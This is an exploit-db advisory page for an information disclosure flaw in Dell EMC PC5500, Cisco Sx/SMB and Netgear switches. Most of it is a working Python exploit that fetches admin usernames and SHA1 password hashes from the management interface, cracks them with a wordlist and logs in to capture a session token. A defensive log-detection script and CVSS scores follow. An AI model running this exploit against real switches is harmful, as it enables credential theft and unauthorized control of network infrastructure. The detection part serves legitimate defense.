Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure

05 Apr 2023 | Reported by Ken Pyle | Type: exploitdb | Source: www.exploit-db.com

# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US
# https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability
# https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
#
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle


import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()

def userName_parser(text, start_delimiter, end_delimiter):
    results = []
    iteration = 0
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)

                iteration = iteration + 1
    return results

# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the values from the file
with open(file, 'r') as f:
    values = f.readlines()

values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    url = response.headers["Location"] + "config/device/adminusersetting"
    response=requests.get(url, verify=False)

    if response.status_code == 200:
        print("[*] Successful request to URL:", url + "\n")
        content = response.text
        users_names = userName_parser(content,"<userName>","</userName>")
        sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)

        print("SHA1 Hashes found:\n")

        loops = 0
        while loops < len(sha1_hashes):
            print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")


            for sha1_hash in sha1_hashes:
                if sha1_hash in hashes:
                     print("Match:", sha1_hash, hashes[sha1_hash])
                     print("\nTesting Credentials via API.\n\n")
                     payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])

                     response_login = requests.get(payload, allow_redirects=False, verify=False)
                     headers = response_login.headers
                     if "sessionID" in headers:
                          print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                          print(headers["sessionID"])
                     else:
                          print("Unable to sign in.")
            loops = loops + 1
    else:
        print("Host is not vulnerable:", response.status_code)






    Ken Pyle
    M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
    Main: 267-540-3337
    Direct: 484-498-8340
    Website: www.cybir.com
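
A defender-side check for the two requests the script above makes, as an added example that is not part of the original exploit-db submission: it scans HTTP access logs for a 200 response on `config/device/adminusersetting` and for `System.xml?action=login` calls. The log source (a proxy or sensor in front of the management interface writing Common Log Format), the sample lines, the path prefix and the finding names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: Common Log Format lines as a proxy or sensor in front of
# the switch management interface might record them (assumed log source).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Apr/2023:10:00:01 +0000] "GET / HTTP/1.1" 302 0
192.0.2.10 - - [05/Apr/2023:10:00:02 +0000] "GET /cs1a2b3c4d/config/device/adminusersetting HTTP/1.1" 200 812
192.0.2.10 - - [05/Apr/2023:10:00:03 +0000] "GET /System.xml?action=login&user=admin&password=REDACTED HTTP/1.1" 200 95
198.51.100.7 - - [05/Apr/2023:10:05:00 +0000] "GET /System.xml?action=login&user=ops&password=REDACTED HTTP/1.1" 200 95
198.51.100.9 - - [05/Apr/2023:10:06:00 +0000] "GET /cs1a2b3c4d/config/device/adminusersetting HTTP/1.1" 401 0
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def detect(log_text):
    """Return {source: [finding, ...]} in the order findings were observed."""
    findings, readers = {}, set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        src, status = m["src"], int(m["status"])
        parts = urlsplit(m["target"])
        query = parse_qs(parts.query, keep_blank_values=True)
        hits = []
        # Account configuration served with 200: the stored hashes left the device.
        if parts.path.rstrip("/").endswith("/config/device/adminusersetting") and status == 200:
            readers.add(src)
            hits.append("account-config-read")
        if parts.path.endswith("/System.xml") and query.get("action") == ["login"]:
            # A login from a source that just pulled the hashes is the high-signal case.
            if src in readers:
                hits.append("login-after-config-read")
            # The API takes the password in the URL, so it lands in every log on the path.
            if "password" in query:
                hits.append("password-in-url")
        for h in hits:
            findings.setdefault(src, []).append(h)
    return findings

if __name__ == "__main__":
    for src, hits in detect(SAMPLE_LOG).items():
        print(src, ", ".join(hits))
```

A 200 on the account-configuration path is a lead to investigate, since the log alone cannot tell an administrator's session from an unauthenticated read.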


Vulners AI Score: 6.8 (Medium risk)
CVSS 2: 5
CVSS 3.1: 7.5 - 8.1
CVSS 3: 7.5
EPSS: 0.17206